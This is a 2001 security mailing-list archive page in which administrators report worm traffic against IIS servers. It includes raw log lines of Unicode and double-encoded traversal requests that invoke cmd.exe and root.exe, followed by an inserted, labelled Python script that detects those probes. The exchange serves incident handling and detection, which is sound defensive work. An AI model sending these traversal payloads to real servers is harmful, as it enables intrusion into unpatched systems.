Security Incidents mailing list archives
Re: CodeBlue finally hitting, or what?
From: Eric Jacobsen <jacobsen () bu edu>
Date: Tue, 18 Sep 2001 11:26:24 -0400
We're seeing much of the same traffic. We've recovered a file called Admin.dll from the /scripts directory in the web tree. This file was copied there by means of tftp and then executed with a second web request.

Crude analysis of Admin.dll shows that it's calling itself: "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"

I'll provide more information later when I've had a chance to examine it more intently.

Eric Jacobsen
jacobsen () bu edu

"Portnoy, Gary" wrote:
Greetings,

I am suddenly seeing hundreds of Unicode traversal requests coming in from all over the world, many of them from previous CodeRed victims. I am guessing someone changed CodeBlue to make it spread faster, because before I saw maybe 1 or 2 CodeBlue attempts a day, and so far I've seen at least 20 in the last hour. Just as a way to help fingerprint it, a few of the attempted exploits use the multiple decode vulnerability....

-Gary-

12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"

Gary Portnoy
Network Administrator
gportnoy () belenosinc com
PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
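The requests Gary quotes are the classic IIS Unicode and double-decode traversal probes (overlong UTF-8 sequences such as %c0%af and %c1%9c, and double-encoded backslashes such as %255c and %%35%63), all aimed at root.exe or cmd.exe. The following log triage script is an added example for this archive page, not code from either poster: it parses combined-format access log lines, emulates the lenient decoding that let these sequences reach the filesystem, and tags each request so a defender can count probing hosts. The sample log lines are constructed for the example (placeholder address 192.0.2.10) and modelled on the quoted ones; the tag names and thresholds are the example's own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: host ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Lead bytes C0/C1 never occur in valid UTF-8 (overlong forms); a lenient decoder
# turns %c0%af into '/' and %c1%9c (or the malformed %c1%1c) into '\'.
OVERLONG_RE = re.compile(r'%(c[01])%([0-9a-f]{2})', re.IGNORECASE)
# A percent sign that decodes to another percent-escape: %25.. or %%35%63.
DOUBLE_ENC_RE = re.compile(r'%(25|%)', re.IGNORECASE)
WORM_TARGETS = ('root.exe', 'cmd.exe')

# Constructed sample lines (not from the thread), modelled on the quoted log.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
192.0.2.10 - - [18/Sep/2001:10:17:05 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['path'] = rec['target'].split('?', 1)[0]   # drop the query string
    return rec


def decode_overlong(path):
    """Emulate a decoder that accepts 2-byte overlong UTF-8 for ASCII characters."""
    def repl(m):
        lead = int(m.group(1), 16)
        cont = int(m.group(2), 16)
        return chr(((lead & 0x1F) << 6) | (cont & 0x3F))
    return OVERLONG_RE.sub(repl, path)


def decode_path(path, rounds=2):
    """Percent-decode repeatedly, as a server that decodes more than once would."""
    for _ in range(rounds):
        step = unquote(decode_overlong(path), encoding='latin-1')
        if step == path:
            break
        path = step
    return path


def classify(line):
    """Parse one line and attach a set of detection tags (empty when benign)."""
    rec = parse_line(line)
    if rec is None:
        return None
    raw = rec['path']
    decoded = decode_path(raw).replace('\\', '/')
    tags = set()
    if '/../' in decoded or decoded.endswith('/..'):
        tags.add('traversal')
    if OVERLONG_RE.search(raw):
        tags.add('overlong-utf8')
    if DOUBLE_ENC_RE.search(raw):
        tags.add('double-encoding')
    if any(decoded.lower().endswith(t) for t in WORM_TARGETS):
        tags.add('worm-target')
    rec['tags'] = tags
    return rec


def summarize(log_text):
    """Return (findings, per_host): tagged requests and a count of hits per source."""
    findings = []
    per_host = Counter()
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec['tags']:
            findings.append((rec['host'], rec['path'], sorted(rec['tags'])))
            per_host[rec['host']] += 1
    return findings, per_host


if __name__ == '__main__':
    found, hosts = summarize(SAMPLE_LOG)
    for host, path, tags in found:
        print(f"{host} {path} {','.join(tags)}")
    for host, n in hosts.most_common():
        print(f"{host}: {n} probing requests")
```

Running it prints four tagged requests from the sample host and leaves the plain /index.html fetch untagged; a 404 on these paths only means the probe missed, so the count per source, not the status code, is what identifies a scanning host.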
Current thread:
- CodeBlue finally hitting, or what? Portnoy, Gary (Sep 18)
- Re: CodeBlue finally hitting, or what? Eric Jacobsen (Sep 18)
- Re: CodeBlue finally hitting, or what? Jason Giglio (Sep 18)
- Re: CodeBlue finally hitting, or what? Tracey Losco (Sep 18)
- Re: CodeBlue finally hitting, or what? Nick FitzGerald (Sep 18)
- <Possible follow-ups>
- RE: CodeBlue finally hitting, or what? Becky Pinkard (Sep 18)